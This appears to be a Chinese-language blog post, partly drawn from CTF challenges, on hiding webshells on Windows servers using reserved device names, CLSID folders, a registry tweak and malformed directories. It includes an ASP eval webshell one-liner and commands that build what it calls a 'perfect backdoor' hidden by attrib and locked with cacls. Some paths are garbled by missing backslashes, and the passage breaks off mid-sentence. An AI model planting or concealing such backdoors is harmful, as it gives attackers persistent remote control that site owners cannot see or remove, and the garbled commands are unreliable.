10. windows下原來可以這樣隱藏webshell

1、利用保留字隱藏

windows系統有些保留文件夾名，windows系統不允許用這些名字命名文件夾，如

aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt

我們可以在cmd下這么做：

echo "<%eval request("joker")%>" >> d:\test.asp copy d:\test.asp .\d:\aux.asp

這樣就可以創建一個無法刪除的文件了，這個文件在圖形界面下是無法刪除的，甚至del d:\aux.asp也無法刪除

博主剛好遇到這樣一道ctf

，發現一個文件COM6.KEY_shell.asp，這就是保留字文件，我們需要讀取文件的內容，得到key ， 雙擊文件 ，明明有這個文件，卻提示找不到文件，經過我們一番百度：

type \\.\C:\Inetpub\wwwroot\COM6.KEY_shell.asp

https://zhidao.baidu.com/question/330540594.html  這個網址告訴了我們 \\.\ 的用法

Q: 為什么rd /s /q \\.\h:\autorun.inf\這條命令為什么能刪除包含畸形文件夾在內的所有文件夾？ 

\\.\理解為\\127.0.0.1\就行了，當然實際上是行不通的。
UNC的一個本地化特例。
?\可以理解成遍歷，?是統配符，表示匹配0個或1個任意字符。
.\代表本地節點，在概念上來有點像磁盤根目錄，也可以說成是計算機根目錄。
所以dir \\.\C:\是可以被命令行解釋器識別的，更可以跨盤符的來使用絕對路徑引用，例如：

F:\>\\.\C:\windows\system32\cmd.exe
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.
F:\>
使用UNC路徑不會撿測路徑中的保留字設備名稱等，因此刪除包含畸形文件夾在內的所有文件夾？。

Q: 為什么del /q /f /a \\?\%1可以刪除所有文件？

A: UNC路徑的一個特例。UNC路徑就是符合 \\servername\sharename 格式，其中 servername 是服務器名，sharename 是共享資源的名稱。?是統配符，表示匹配0個或1個任意字符。使用UNC路徑不會撿測路徑中的保留字設備名稱等，因此可以用這種方法來刪除特殊文件或目錄。

Q: 為什么說這樣的命令非常危險？

A: 如果你想刪除的文件夾中包含特殊路徑，可能導致整個磁盤分區的數據全部被刪除。因此，如果你還不能對這個命令了如指掌，不建議使用這樣的命令。

 

2、利用clsid隱藏

windows中每一個程序都有一個clsid，創建一個文件夾，取名x.{21ec2020-3aea-1069-A2dd-08002b30309d}這時候打開這個文件夾就是控制面板了。

為了更隱蔽些我們可以結合windows保留字使用以下命令：

md \.d:com1.{21ec2020-3aea-1069-A2dd-08002b30309d}

這樣生成的文件夾無法刪除，無法修改,無法查看

 

 

3、利用注冊表隱藏

注冊表路徑：

HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer＼AdvancedFolderHiddenSHOWALL

在這個路徑下有一個CheckedValue的鍵值，把他修改為0，如果沒有CheckValue這個key直接創建一個，將他賦值為0，然后創建的隱藏文件就徹底隱藏了，即時在文件夾選項下把“顯示所有文件”也不能顯示了。

最后我們結合保留字和clsid兩種方法生成一個后門。首先我們創建一個目錄md \.d:com1.{21ec2020-3aea-1069-A2dd-08002b30309d}

接着attrib -s -h -a -r x:RECYCLED&&copyx:RECYCLED \.d:com1.{21ec2020-3aea-1069-A2dd-08002b30309d}

為了保險起見，我們在這個回收站丟點東西證明它是在運作的echo execcode>>\.d:com1.{21ec2020-3aea-1069-A2dd-08002b30309d}RECYCLEDaux.asp

好了一個超級猥瑣的后門誕生了，但，並不完美，或許還可以這么做

attrib \.d:com1.{21ec2020-3aea-1069-A2dd-08002b30309d}RECYCLEDaux.asp +h+s +r +d /s /d

cacls /E /G Everyone:N

一個基於system桌面權限以及任何webshell，以及Cmd下的都無法查看，修改，和Del的完美后門誕生了。

 

4.利用畸形目錄

不少人在XP系統下用md xxx..\命令建立帶·的文件夾（亦稱畸形目錄），用來存放一些“秘密”的東東，需要看的時候，用運行命令打開。
可是，在Win7系統下，這個方法失靈了。而且不能用XP系統下的方法打開這種文件夾。
其實，md xxx..\方法是DOS時代就“發明”的方法，是利用微軟文件系統的漏洞開個玩笑而已。
很不幸的是，這種玩笑在XP時代被中國人奉為至寶，紛紛用來放一些見不得人的東東。其實知道打開方法的人都可以對這種文件夾下的“秘密”一覽無遺。
哎呀，話題扯遠了，回到正題。在Win7系統下有無辦法打開XP系統下建立的畸形目錄呢？
當然是有的！只要知道這種畸形目錄的真實DOS（8.3格式）名稱即可。怎樣查看它的真實名稱呢？
很簡單，用帶/x參數的dir命令即可。
假定在f盤的abc文件夾下有個畸形目錄g..\（顯示為g.文件夾），那么，在win7下打開命令行窗口，運行dir /x f:\abc命令，如下圖。
找到有g.的行，可以看到畸形文件夾的真實dos名稱是GE276~1，然后打開“運行”窗口，輸入f:\abc\ge276~1並回車，即可打開這個畸形目錄。

 

 

剛做了一道ctf，利用的就是這個，我們來看：，有一個888.文件夾，我們點擊打開

 

， 果然打不開，但是這個文件夾是真實存在的，我們利用上面上的方法